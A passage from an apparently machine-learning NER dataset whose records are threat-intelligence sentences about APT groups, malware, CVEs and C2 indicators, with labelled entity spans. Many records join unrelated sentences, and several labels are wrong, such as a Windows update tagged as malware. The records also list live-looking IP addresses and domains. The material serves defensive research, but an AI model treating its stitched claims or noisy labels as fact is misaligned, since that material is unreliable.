The MuddyWaters group has carried out a large number of attacks and demonstrated advanced social engineering , in addition to the active development of attacks , infrastructure and the use of new methods and techniques .", "spans": {"SYSTEM: iOS": [[45, 48]], "SYSTEM: Android": [[88, 95], [154, 161]], "VULNERABILITY: CVE-2017-8759": [[207, 220]], "THREAT_ACTOR: MuddyWaters group": [[300, 317]]}, "info": {"id": "cyberner_stix_train_006299", "source": "cyberner_stix_train"}} {"text": "Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . Documents with the flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal .", "spans": {"ORGANIZATION: Trend Micro": [[0, 11]], "THREAT_ACTOR: MuddyWater’s": [[26, 38]], "MALWARE: POWERSTATS v3": [[97, 110]], "FILEPATH: Documents": [[113, 122]], "TOOL: flash": [[132, 137]], "VULNERABILITY: exploit": [[138, 145], [207, 214]], "TOOL: VirusTotal": [[218, 228]]}, "info": {"id": "cyberner_stix_train_006300", "source": "cyberner_stix_train"}} {"text": "android.intent.action.restart A legacy intent used to indicate a system restart . Since at least 2012 , APT41 has repeatedly gained access to game development environments within affected companies , including online multiplayer networks , as well as targeting of production database administrators . For full details , please reference our 2014 report , APT28 : A Window into Russia 's Cyber Espionage Operations .", "spans": {"THREAT_ACTOR: APT41": [[104, 109]], "ORGANIZATION: online multiplayer networks": [[210, 237]], "ORGANIZATION: administrators": [[284, 298]], "THREAT_ACTOR: APT28": [[355, 360]]}, "info": {"id": "cyberner_stix_train_006301", "source": "cyberner_stix_train"}} {"text": "LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . 
The Winnti umbrella continues to operate highly successfully in 2018 .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[48, 78]], "VULNERABILITY: CVE-2017-11882": [[81, 95]], "MALWARE: Winnti": [[104, 110]]}, "info": {"id": "cyberner_stix_train_006302", "source": "cyberner_stix_train"}} {"text": "We can also replace “ shfolder.dll ” ( and add a DLL export proxy to avoid a crash ) , which is loaded whenever the attacker clicks the builder tab – allowing us to infect the server while it runs , without the need to wait for application restart .", "spans": {"FILEPATH: shfolder.dll": [[22, 34]], "TOOL: DLL": [[49, 52]]}, "info": {"id": "cyberner_stix_train_006303", "source": "cyberner_stix_train"}} {"text": "Details of the extended attack campaign associated with the Cannon Trojan will be discussed in a later blog .", "spans": {"MALWARE: Cannon": [[60, 66]], "MALWARE: Trojan": [[67, 73]]}, "info": {"id": "cyberner_stix_train_006304", "source": "cyberner_stix_train"}} {"text": "As soon as this service is started , it creates two processes that take care of connection and disconnection to the C & C server . The earliest known use of Equation Group tools by Buckeye is March 31 , 2016 , during an attack on a target in Hong Kong . The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"TOOL: Equation Group tools": [[157, 177]], "THREAT_ACTOR: Buckeye": [[181, 188]]}, "info": {"id": "cyberner_stix_train_006305", "source": "cyberner_stix_train"}} {"text": "However , in one organization almost 500 recipients received a mail , while in two other organizations , more than 100 were selected .", "spans": {}, "info": {"id": "cyberner_stix_train_006306", "source": "cyberner_stix_train"}} {"text": "The JAR file is the decrypted version of the file tong.luo , which is located in the assets folder . 
In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . On January 15 , Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor .", "spans": {"THREAT_ACTOR: Emissary Panda": [[319, 333]], "ORGANIZATION: Advanced Threat Research": [[360, 384]], "MALWARE: SYSCON backdoor": [[436, 451]]}, "info": {"id": "cyberner_stix_train_006307", "source": "cyberner_stix_train"}} {"text": "Using this as the next pivot , we have 6,034 unique samples that get returned in AutoFocus having made POST requests to these sites .", "spans": {}, "info": {"id": "cyberner_stix_train_006308", "source": "cyberner_stix_train"}} {"text": "The number to call is received along with the command , as seen in Figure 9 . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . 
Threat Group-3390 : TG-3390 ,Emissary Panda , BRONZE UNION , APT27 , Iron Tiger , LuckyMouse .", "spans": {"ORGANIZATION: Symantec": [[84, 92]], "MALWARE: Filensfer": [[123, 132]], "MALWARE: Buckeye malware": [[284, 299]], "TOOL: (Backdoor.Pirpi)": [[300, 316]], "THREAT_ACTOR: Threat Group-3390": [[319, 336]], "THREAT_ACTOR: TG-3390": [[339, 346]], "THREAT_ACTOR: ,Emissary Panda": [[347, 362]], "THREAT_ACTOR: BRONZE UNION": [[365, 377]], "THREAT_ACTOR: APT27": [[380, 385]], "THREAT_ACTOR: Iron Tiger": [[388, 398]], "THREAT_ACTOR: LuckyMouse": [[401, 411]]}, "info": {"id": "cyberner_stix_train_006309", "source": "cyberner_stix_train"}} {"text": "Figure 11 : ‘ Agent Smith ’ uses man-in-disk to install the malicious update Technical Analysis – Boot Module The “ boot ” module is basically another “ loader ” module , but this time it ’ s executed in the infected application . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . Instead , they exist only in memory , and Dexphot runs them by loading them into other system processes via process hollowing . This shorcut uses the WebDav HTTP protocol extension to retrieve the file launcher-upd.hta from a remote server : This heavily obfuscated script is responsible for the execution of PowerShell that downloads the final malware payload ( NetSupport RAT ) .", "spans": {"MALWARE: Agent Smith": [[14, 25]], "VULNERABILITY: man-in-disk": [[33, 44]], "MALWARE: Careto": [[231, 237]], "MALWARE: Dexphot": [[380, 387]], "TOOL: process hollowing": [[446, 463]], "SYSTEM: a remote server": [[562, 577]], "MALWARE: NetSupport RAT": [[701, 715]]}, "info": {"id": "cyberner_stix_train_006310", "source": "cyberner_stix_train"}} {"text": "It sends all of this data to the C2 server using the URL ending with /servlet/AppInfos . 
The group’s implants are characterized by the employment of information stealing tools among them being screenshot and document stealers delivered via a SFX , and made to achieve persistence through a scheduled task . Over the years , the Ke3chang attackers have used three types of malware that we call : \" BS2005 \" , \" BMW \" , and \" MyWeb \" .", "spans": {"THREAT_ACTOR: group’s": [[93, 100]], "TOOL: stealing tools": [[161, 175]], "TOOL: document stealers": [[208, 225]], "THREAT_ACTOR: Ke3chang": [[328, 336]], "THREAT_ACTOR: attackers": [[337, 346]], "MALWARE: BS2005": [[397, 403]], "MALWARE: BMW": [[410, 413]], "MALWARE: MyWeb": [[424, 429]]}, "info": {"id": "cyberner_stix_train_006311", "source": "cyberner_stix_train"}} {"text": "Some of the tools used by PLATINUM , such as the port-knocking backdoor , show signs of organized thinking . In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" . Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": {"THREAT_ACTOR: PLATINUM": [[26, 34]], "MALWARE: Spindest": [[244, 252]], "TOOL: C2": [[427, 429]]}, "info": {"id": "cyberner_stix_train_006312", "source": "cyberner_stix_train"}} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: .doc files": [[54, 64]], "MALWARE: RTF documents": [[85, 98]], "VULNERABILITY: CVE-2017-8570": [[123, 136]], "VULNERABILITY: Composite": [[139, 148]], "VULNERABILITY: Moniker": [[149, 156]], "MALWARE: WannaCry": [[161, 169]], "VULNERABILITY: exploit": [[183, 190]], "VULNERABILITY: EternalBlue": [[205, 216]], "THREAT_ACTOR: Shadow Brokers": [[246, 260]]}, "info": {"id": "cyberner_stix_train_006313", "source": "cyberner_stix_train"}} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": {"MALWARE: Documents": [[0, 9]], "VULNERABILITY: Flash exploit": [[19, 32]], "FILEPATH: RoyalDNS malware": [[169, 185]], "FILEPATH: Ketrican": [[192, 200]]}, "info": {"id": "cyberner_stix_train_006314", "source": "cyberner_stix_train"}} {"text": "In their latest leak , they have released the UNITEDRAKE NSA exploit , which is a remote access and control tool that can remotely target Windows-based systems to capture desired information and transfer it to a server . The initial attack vector used in the attack against the data center is unclear , but researchers believe LuckyMouse possibly had conducted watering hole or phishing attacks to compromise accounts belonging to employees at the national data center .", "spans": {"VULNERABILITY: UNITEDRAKE NSA exploit": [[46, 68]], "THREAT_ACTOR: LuckyMouse": [[327, 337]], "ORGANIZATION: employees": [[431, 440]]}, "info": {"id": "cyberner_stix_train_006315", "source": "cyberner_stix_train"}} {"text": "Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year . 
As detailed in the DOJ complaint , a sample of WHITEOUT ( aka Contopee ) malware we attribute to APT38 was used between 2015 and 2016 against a Southeast Asian bank . Thus , In light of this , Mandiant has used the following approaches to identify potential exploitation of CVE-2023 - 4966 and subsequent session hijacking .", "spans": {"MALWARE: Gooligan": [[34, 42]], "MALWARE: SnapPea": [[69, 76]], "TOOL: WHITEOUT": [[140, 148]], "TOOL: Contopee": [[155, 163]], "THREAT_ACTOR: APT38": [[190, 195]], "ORGANIZATION: bank": [[253, 257]], "ORGANIZATION: Mandiant": [[286, 294]], "VULNERABILITY: CVE-2023 - 4966": [[367, 382]]}, "info": {"id": "cyberner_stix_train_006316", "source": "cyberner_stix_train"}} {"text": "Tellingly , current virus writers have mastered commercial obfuscators . the United Kingdom had data stolen by members of Emissary Panda . The patched code is located right after the load of hpqhvsei.dll . Additionally , the IP address 198.244.135[.]250 is being utilized for another C2 domain prontoposer[.]com while still having a PTR record to the domain previously identified .", "spans": {"THREAT_ACTOR: Emissary Panda": [[122, 136]], "FILEPATH: hpqhvsei.dll": [[191, 203]], "SYSTEM: IP address 198.244.135[.]250": [[225, 253]], "SYSTEM: C2 domain prontoposer[.]com": [[284, 311]]}, "info": {"id": "cyberner_stix_train_006317", "source": "cyberner_stix_train"}} {"text": "This is an interesting anti-sandbox technique , as it requires human interaction prior to the document exhibiting any malicious activity .", "spans": {}, "info": {"id": "cyberner_stix_train_006318", "source": "cyberner_stix_train"}} {"text": "The hosting locations seen for some HenBox samples , together with the nature of some embedded apps including : those targeted at extremist groups , those who use VPN or other privacy-enabling apps , and those who speak the Uyghur language , highlights the victim profile the threat actors were seeking to attack . 
The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": {"MALWARE: HenBox": [[36, 42]], "MALWARE: BalkanRAT malware": [[336, 353]], "THREAT_ACTOR: APT33": [[447, 452]], "FILEPATH: malicious file": [[519, 533]]}, "info": {"id": "cyberner_stix_train_006319", "source": "cyberner_stix_train"}} {"text": "This tradecraft is thus scalable and available to others even if the malware itself changes .", "spans": {}, "info": {"id": "cyberner_stix_train_006320", "source": "cyberner_stix_train"}} {"text": "In Version 0.0.0.1 , the communication with the C2 is encrypted using Base64 and RC4 . Development of Bemstour has continued into 2019 . One payload was a Python based open source remote administration tool ( RAT ) called Pupy .", "spans": {"MALWARE: Bemstour": [[102, 110]], "TOOL: Python": [[155, 161]], "MALWARE: remote administration tool": [[180, 206]], "MALWARE: RAT": [[209, 212]], "MALWARE: Pupy": [[222, 226]]}, "info": {"id": "cyberner_stix_train_006321", "source": "cyberner_stix_train"}} {"text": "Despite phishing incidents for Mac devices being rarer than their Windows counterparts , users should still be aware that attackers can target them at any moment .", "spans": {"SYSTEM: Mac": [[31, 34]], "SYSTEM: Windows": [[66, 73]]}, "info": {"id": "cyberner_stix_train_006322", "source": "cyberner_stix_train"}} {"text": "We also detected it in apps targeted toward specific Middle Eastern demographics . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain . Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol . 
The software is centrally hosted on that third - party company ’s servers .", "spans": {"SYSTEM: third - party company ’s servers": [[358, 390]]}, "info": {"id": "cyberner_stix_train_006323", "source": "cyberner_stix_train"}} {"text": "Executable payload exploits local privilege escalation ( CVE-2015-1701 ) to steal System token .", "spans": {"VULNERABILITY: CVE-2015-1701": [[57, 70]]}, "info": {"id": "cyberner_stix_train_006324", "source": "cyberner_stix_train"}} {"text": "Install a mobile security solution to secure your device from threats . In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . the blue-highlighted immediate value 0x4624F47C is assigned to block comparison variable in the first block . In one exchange on Aug. 16 , 2012 , Ashley Madison ’s director of IT was asked to produce a list of all company employees with all - powerful administrator access .", "spans": {"THREAT_ACTOR: Cobalt": [[95, 101]], "ORGANIZATION: Ashley Madison ’s director of IT": [[448, 480]]}, "info": {"id": "cyberner_stix_train_006325", "source": "cyberner_stix_train"}} {"text": "By : Hara Hiroaki , Lilang Wu , Lorin Wu April 02 , 2019 In previous attacks , XLoader posed as Facebook , Chrome and other legitimate applications to trick users into downloading its malicious app . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . test4.hta http://comonscar.in ( 82.145.40.46 ) . 
PIEHOP expects its main function to be called via another Python file , supplying either the argument or .", "spans": {"MALWARE: XLoader": [[79, 86]], "SYSTEM: Facebook": [[96, 104]], "SYSTEM: Chrome": [[107, 113]], "ORGANIZATION: FireEye": [[213, 220]], "THREAT_ACTOR: admin@338": [[227, 236]], "VULNERABILITY: Microsoft Office vulnerabilities": [[304, 336]], "TOOL: LOWBALL": [[387, 394]], "FILEPATH: test4.hta": [[397, 406]], "URL: http://comonscar.in": [[407, 426]], "IP_ADDRESS: 82.145.40.46": [[429, 441]], "TOOL: PIEHOP": [[446, 452]]}, "info": {"id": "cyberner_stix_train_006326", "source": "cyberner_stix_train"}} {"text": "In this case , the attackers hacked a Tibetan activist ’ s account and used it to attack Uyghur activists . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . We have identified the tools , techniques , and network activities used in these continuing attacks—which we have dubbed Night Dragon—as originating primarily in China .", "spans": {"TOOL: InPage software": [[148, 163]], "ORGANIZATION: Unit42": [[218, 224]], "VULNERABILITY: InPage exploits": [[247, 262]], "ORGANIZATION: Kaspersky": [[358, 367]], "THREAT_ACTOR: Night Dragon—as": [[491, 506]]}, "info": {"id": "cyberner_stix_train_006327", "source": "cyberner_stix_train"}} {"text": "Symantec saw the first evidence of Sowbug group with the discovery in March 2017 of an entirely new piece of malware called Felismus used against a target in Southeast Asia . 
The Windows 10 Creators Update will bring several enhancements to Windows Defender ATP that will provide SOC personnel with options for immediate mitigation of a detected threat .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Sowbug group": [[35, 47]], "TOOL: Felismus": [[124, 132]], "MALWARE: Windows 10 Creators Update": [[179, 205]], "ORGANIZATION: Windows Defender ATP": [[241, 261]], "ORGANIZATION: SOC personnel": [[280, 293]]}, "info": {"id": "cyberner_stix_train_006328", "source": "cyberner_stix_train"}} {"text": "Unlike previously seen non-GP ( Google Play ) centric malware campaigns , “ Agent Smith ” has a significant impact upon not only developing countries but also some developed countries where GP is readily available . While documents designed to exploit the InPage software are rare , they are not new – however in recent weeks Unit42 has observed numerous InPage exploits leveraging similar shellcode , suggesting continued use of the exploit previously discussed by Kaspersky . However , the batch file is not always present , and the names of the ZIP files and Loader DLLs , as well as the password for extracting the ZIP file , all change from one package to the next . Approximately twenty days later , the attacker placed another web shell on a separate Microsoft Exchange Server .", "spans": {"SYSTEM: Google Play": [[32, 43]], "MALWARE: Agent Smith": [[76, 87]], "TOOL: InPage software": [[256, 271]], "ORGANIZATION: Unit42": [[326, 332]], "VULNERABILITY: InPage exploits": [[355, 370]], "ORGANIZATION: Kaspersky": [[466, 475]], "TOOL: Loader DLLs": [[562, 573]], "THREAT_ACTOR: attacker": [[710, 718]], "SYSTEM: Microsoft Exchange Server": [[758, 783]]}, "info": {"id": "cyberner_stix_train_006329", "source": "cyberner_stix_train"}} {"text": "The seller , known as \" bestoffer , '' was , at some point , expelled from the forum . 
In the majority of instances APT10 used either a reverse shell or RDP connection to install its malware ; the actor also uses these methods to propagate across the network . Based on our statistics , over 57 , 000 Kaspersky users have downloaded and installed the backdoored version of ASUS Live Update at some point in time . The connection to the Lazarus group was obvious by inspecting the tools , strategies , and methods already linked to the North Korean actor .", "spans": {"THREAT_ACTOR: APT10": [[116, 121]], "TOOL: reverse shell": [[136, 149]], "TOOL: RDP": [[153, 156]], "THREAT_ACTOR: actor": [[197, 202]], "ORGANIZATION: Kaspersky": [[301, 310]], "TOOL: ASUS Live Update": [[373, 389]], "THREAT_ACTOR: the Lazarus group": [[432, 449]], "THREAT_ACTOR: inspecting the tools , strategies , and methods": [[465, 512]], "THREAT_ACTOR: the North Korean actor": [[531, 553]]}, "info": {"id": "cyberner_stix_train_006330", "source": "cyberner_stix_train"}} {"text": "We ’ve had lots of experience with both of these actors attempting to target our customers in the past and know them well .", "spans": {}, "info": {"id": "cyberner_stix_train_006331", "source": "cyberner_stix_train"}} {"text": "PINCHY SPIDER sells access to use GandCrab ransomware under a partnership program with a limited number of accounts . The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[0, 13]], "TOOL: GandCrab ransomware": [[34, 53]], "ORGANIZATION: technology": [[202, 212]], "ORGANIZATION: internet firms": [[217, 231]]}, "info": {"id": "cyberner_stix_train_006332", "source": "cyberner_stix_train"}} {"text": "Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . 
Public disclosure by third-parties , including the DHS , associate ALLANITE operations with Russian strategic interests .", "spans": {"THREAT_ACTOR: Patchwork": [[9, 18]], "MALWARE: RTF files": [[45, 54]], "VULNERABILITY: CVE-2017-8570": [[66, 79]], "ORGANIZATION: DHS": [[133, 136]]}, "info": {"id": "cyberner_stix_train_006333", "source": "cyberner_stix_train"}} {"text": "Like CORESHELL , one of the beacons includes a process listing from the victim host .", "spans": {"MALWARE: CORESHELL": [[5, 14]]}, "info": {"id": "cyberner_stix_train_006334", "source": "cyberner_stix_train"}} {"text": "WICKED PANDA has also targeted chemical and think tank sectors around the world . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 .", "spans": {"ORGANIZATION: chemical": [[31, 39]], "ORGANIZATION: think tank": [[44, 54]], "THREAT_ACTOR: APT12": [[113, 118]], "MALWARE: HIGHTIDE": [[147, 155]], "TOOL: Microsoft Word": [[164, 178]], "FILEPATH: .doc": [[181, 185]], "VULNERABILITY: CVE-2012-0158": [[211, 224]]}, "info": {"id": "cyberner_stix_train_006335", "source": "cyberner_stix_train"}} {"text": "The malware mimics legit services such as Google service , GooglePlay or Flash update . Instead , Lead often simply emails a Winnti installer to potential victims , relying on basic social engineering tactics to convince recipients to run the attached malware . Campaign victims were identified by using Whois records and open source research . 
As a result , we decided to call this variant FakeSG .", "spans": {"ORGANIZATION: Google": [[42, 48]], "SYSTEM: GooglePlay": [[59, 69]], "SYSTEM: Flash": [[73, 78]], "TOOL: Winnti installer": [[125, 141]], "TOOL: Whois": [[304, 309]], "MALWARE: FakeSG": [[391, 397]]}, "info": {"id": "cyberner_stix_train_006336", "source": "cyberner_stix_train"}} {"text": "The event handlers call functions with the following names , which includes an incrementing number that represents the order in which the functions are called : onload1 , onload2 , onload3 , onload5 .", "spans": {}, "info": {"id": "cyberner_stix_train_006337", "source": "cyberner_stix_train"}} {"text": "It ’ s worth noting however , about one-third of the HenBox apps contained embedded APK objects that did not refer to legitimate apps . Winnti hackers also penetrated the BASF and Siemens networks . Despite the differing sponsorship , penetration of Hong Kong and Taiwan-based media organizations continues to be a priority for China-based APT16 .", "spans": {"MALWARE: HenBox": [[53, 59]], "THREAT_ACTOR: Winnti": [[136, 142]], "ORGANIZATION: BASF": [[171, 175]], "ORGANIZATION: Siemens": [[180, 187]], "ORGANIZATION: networks": [[188, 196]], "ORGANIZATION: media organizations": [[277, 296]], "THREAT_ACTOR: APT16": [[340, 345]]}, "info": {"id": "cyberner_stix_train_006338", "source": "cyberner_stix_train"}} {"text": "In 2013 , both COSEINC and FireEye revealed attacks using Bisonal against Japanese organizations . 
To reduce the risk of losing access to the internal bank network , the Carbanak , in addition to malicious programs , also used for remote access legitimate programs such as Ammy Admin and Team Viewer .", "spans": {"ORGANIZATION: COSEINC": [[15, 22]], "ORGANIZATION: FireEye": [[27, 34]], "TOOL: Bisonal": [[58, 65]], "MALWARE: Carbanak": [[170, 178]], "MALWARE: Ammy Admin": [[273, 283]], "MALWARE: Team Viewer": [[288, 299]]}, "info": {"id": "cyberner_stix_train_006339", "source": "cyberner_stix_train"}} {"text": "Configure Group Policy to restrict all users to only one login session , where possible .", "spans": {}, "info": {"id": "cyberner_stix_train_006340", "source": "cyberner_stix_train"}} {"text": "The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"THREAT_ACTOR: FIN7": [[36, 40]], "ORGANIZATION: various companies": [[74, 91]], "ORGANIZATION: financial": [[109, 118]], "MALWARE: NetTraveler": [[172, 183]], "VULNERABILITY: exploit": [[197, 204]], "VULNERABILITY: CVE-2012-0158": [[205, 218]], "MALWARE: NetTraveler Trojan": [[230, 248]]}, "info": {"id": "cyberner_stix_train_006341", "source": "cyberner_stix_train"}} {"text": "No matter what button is pressed , the window stays on top of all other windows . Like all of Gorgon Group 's members , Fudpage 's online profile , infrastructure utilization and standardization , connects them back to Gorgon Group . 
, A typical log entry showing access to the PowerShell backend is detailed in the Remote PowerShell HTTP logs , located in , such as in the example below : CrowdStrike incident responders discovered Remote PowerShell logs similar to log entries for ProxyNotShell exploitation to gain initial access , suggesting the attacker leveraged Remote PowerShell .", "spans": {"THREAT_ACTOR: Gorgon Group": [[94, 106], [219, 231]], "TOOL: infrastructure utilization": [[148, 174]], "TOOL: standardization": [[179, 194]], "ORGANIZATION: CrowdStrike incident responders": [[390, 421]], "THREAT_ACTOR: attacker": [[550, 558]], "TOOL: Remote PowerShell": [[569, 586]]}, "info": {"id": "cyberner_stix_train_006342", "source": "cyberner_stix_train"}} {"text": "We also believe the tasking to have been temporary , because we have not observed any further similar targeting from the Dukes after the spring of 2014 .", "spans": {"THREAT_ACTOR: Dukes": [[121, 126]]}, "info": {"id": "cyberner_stix_train_006343", "source": "cyberner_stix_train"}} {"text": "The serialization assigns unique IDs for serializable objects types .", "spans": {}, "info": {"id": "cyberner_stix_train_006344", "source": "cyberner_stix_train"}} {"text": "Most of the group 's attacks are focused on government or technology related companies and organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_006345", "source": "cyberner_stix_train"}} {"text": "The final APK is downloaded from a different URL that is currently down , we assume that the apk purpose is overlaying ads on the screen , we assume this based on the research we have done on the API we found which returns URL of random APK file containing different advertising networks . The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . 
The Palo Alto Networks Unit 42 research team recently came across a series of malicious files which were almost identical to those targeting the Saudi Arabian government previously discussed by MalwareBytes .", "spans": {"TOOL: JHUHUGIT": [[294, 302]], "VULNERABILITY: Java zero-day": [[400, 413]], "VULNERABILITY: CVE-2015-2590": [[416, 429]], "ORGANIZATION: Palo Alto Networks Unit 42": [[451, 477]], "FILEPATH: malicious files": [[525, 540]], "ORGANIZATION: government": [[606, 616]], "ORGANIZATION: MalwareBytes": [[641, 653]]}, "info": {"id": "cyberner_stix_train_006346", "source": "cyberner_stix_train"}} {"text": "Content of bdata.xml file : It can be added to the /system/etc/sysconfig/ path to allowlist specified implant components from the battery saving system . The malware known as RATANKBA is just one of the weapons in Lazarus ' arsenal . APT33 : 162.250.145.234 mynetwork.ddns.net . When it comes to Cuba and similar threats , access to highfidelity threat intelligence to help identify the highest risk , most actively exploitable vulnerabilities can help prioritization efforts when organizations are faced with a backlog of vulnerabilities to address .", "spans": {"TOOL: RATANKBA": [[175, 183]], "THREAT_ACTOR: Lazarus": [[214, 221]], "THREAT_ACTOR: APT33": [[234, 239]], "IP_ADDRESS: 162.250.145.234": [[242, 257]], "DOMAIN: mynetwork.ddns.net": [[258, 276]], "THREAT_ACTOR: Cuba": [[296, 300]]}, "info": {"id": "cyberner_stix_train_006347", "source": "cyberner_stix_train"}} {"text": "Ultimately , APT35 had used access to hundreds of mailboxes to read email communications and steal data related to Middle East organizations , which later became victims of destructive attacks . 
Infy engaged in malware spearphishing against the same targets as Flying Kitten from the outset of its campaign ; Operation Cleaver has registered several resources related to development agencies that have been the subject of intrusion attempts by others since February 2014 .", "spans": {"THREAT_ACTOR: APT35": [[13, 18]], "ORGANIZATION: email communications": [[68, 88]], "MALWARE: Infy": [[195, 199]], "ORGANIZATION: development agencies": [[371, 391]]}, "info": {"id": "cyberner_stix_train_006348", "source": "cyberner_stix_train"}} {"text": "Adobe Flash Player exploit . Like many espionage campaigns , much of APT40 's activity begins by attempting to trick targets with phishing emails , before deploying malware such as the Gh0st RAT trojan to maintain persistence on a compromised network .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[0, 26]], "THREAT_ACTOR: APT40": [[69, 74]], "TOOL: emails": [[139, 145]], "MALWARE: Gh0st RAT trojan": [[185, 201]]}, "info": {"id": "cyberner_stix_train_006349", "source": "cyberner_stix_train"}} {"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": {"ORGANIZATION: FireEye": [[18, 25]], "THREAT_ACTOR: APT34": [[35, 40]], "VULNERABILITY: vulnerability": [[83, 96]], "ORGANIZATION: government organization": [[109, 132]], "ORGANIZATION: Symantec": [[160, 168]], "FILEPATH: Filensfer": [[199, 208]], "FILEPATH: Buckeye malware": [[360, 375]], "MALWARE: (Backdoor.Pirpi)": [[376, 392]]}, "info": {"id": "cyberner_stix_train_006350", "source": "cyberner_stix_train"}} {"text": "It 's restarted in the next cycle independently based on if WhatsApp is running . 
Callisto Group appears to be intelligence gathering related to European foreign and security policy . If you compare the HTTP GET request from the RIPTIDE samples to the HTTP GET request from the HIGHTIDE samples you can see the malware author changed the following items : User Agent , Format and structure of the HTTP Uniform Resource Identifier ( URI ) . WellMail has been observed using TCP port 25 , without using SMTP , to leverage an open port for secure command and control communications .", "spans": {"SYSTEM: WhatsApp": [[60, 68]], "MALWARE: RIPTIDE": [[229, 236]], "MALWARE: HIGHTIDE": [[278, 286]], "TOOL: Uniform Resource Identifier": [[402, 429]], "TOOL: URI": [[432, 435]], "MALWARE: WellMail": [[440, 448]]}, "info": {"id": "cyberner_stix_train_006351", "source": "cyberner_stix_train"}} {"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity change , unlocking the phone , elapsed time interval , and others . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA . ZIP structure was not considered.) Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . That is very concerning to us , however , there are a couple of things that end users can look out for : Although zero - click exploits do exist , they 're not very common .", "spans": {"ORGANIZATION: U.S. Government": [[258, 273]], "THREAT_ACTOR: HIDDEN COBRA": [[347, 359]], "TOOL: PowerArchiver 2019": [[428, 446]], "TOOL: WinRar": [[449, 455]], "TOOL: 7Zip": [[462, 466]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.zip": [[515, 549]], "VULNERABILITY: zero - click exploits": [[666, 687]]}, "info": {"id": "cyberner_stix_train_006352", "source": "cyberner_stix_train"}} {"text": "] today svc [ . 
Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter . The sample , which was deployed against an organization involved in shaping economic policy , was downloaded from the following URL : We also utilized this data to build higher - fidelity detections of web server process chains .", "spans": {"TOOL: ShimRat": [[78, 85]], "TOOL: SimRatReporter": [[90, 104]], "THREAT_ACTOR: web server process chains": [[309, 334]]}, "info": {"id": "cyberner_stix_train_006354", "source": "cyberner_stix_train"}} {"text": "After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . We believe the groups moved to use CVE-2018-0798 instead of the other Microsoft Equation Editor Remote Code Execution ( RCE ) vulnerabilities because the former is more reliable as it works on all known versions of Equation Editor .", "spans": {"MALWARE: RTF files": [[52, 61]], "VULNERABILITY: CVE-2018-0798": [[82, 95], [189, 202]], "THREAT_ACTOR: groups": [[169, 175]], "ORGANIZATION: Microsoft": [[224, 233]], "TOOL: Equation Editor Remote Code Execution": [[234, 271]], "TOOL: RCE": [[274, 277]]}, "info": {"id": "cyberner_stix_train_006355", "source": "cyberner_stix_train"}} {"text": "Bart ransomware appeared for exactly one day on June 24 , 2016 .", "spans": {"MALWARE: Bart": [[0, 4]]}, "info": {"id": "cyberner_stix_train_006356", "source": "cyberner_stix_train"}} {"text": "It is an invaluable source of intelligence about a given campaign .. The following snippet shows the location within the Trojan where it uses SQLite database commands to store and recall command-and-control addresses : Backdoor Commands The Red Alert code also contains an embedded list of commands the botmaster can send to the bot . The group has compromised more than 